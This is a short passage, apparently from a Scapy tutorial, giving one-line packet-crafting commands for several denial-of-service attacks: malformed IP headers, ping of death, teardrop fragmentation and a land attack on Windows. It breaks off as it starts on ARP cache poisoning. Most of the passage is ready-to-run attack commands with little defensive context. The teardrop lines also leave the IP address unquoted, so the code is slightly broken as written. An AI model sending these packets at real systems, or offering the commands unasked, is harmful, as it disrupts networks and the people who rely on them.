Malformed packets
What this does is masquerade the data because the protocol dissector is limited to fully breakdown the content. By giving factors that that are not commonly recognize in the protocol suite like identifying as version 3
, we can easily implement this on a network:
>>> send(IP(dst="10.1.1.5", ihl=2, version=3)/ICMP())
Ping of death
The ping of death is another easy instance for a DoS attack using a large set of malform packets:
>>> send( fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)) )
Teardrop attack (aka Nestea)
Another DoS from back in the day, using fragment offset to sabotage the victim connection/network communication:
>>> send(IP(dst=192.168.0.6, id=42, flags="MF")/UDP()/("X"*10))
>>> send(IP(dst=192.168.0.6, id=42, frag=48)/("X"*116))
>>> send(IP(dst=192.168.0.6, id=42, flags="MF")/UDP()/("X"*224))
Land attack (only Microsoft Windows):
>>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))
ARP cache poisoning
This is...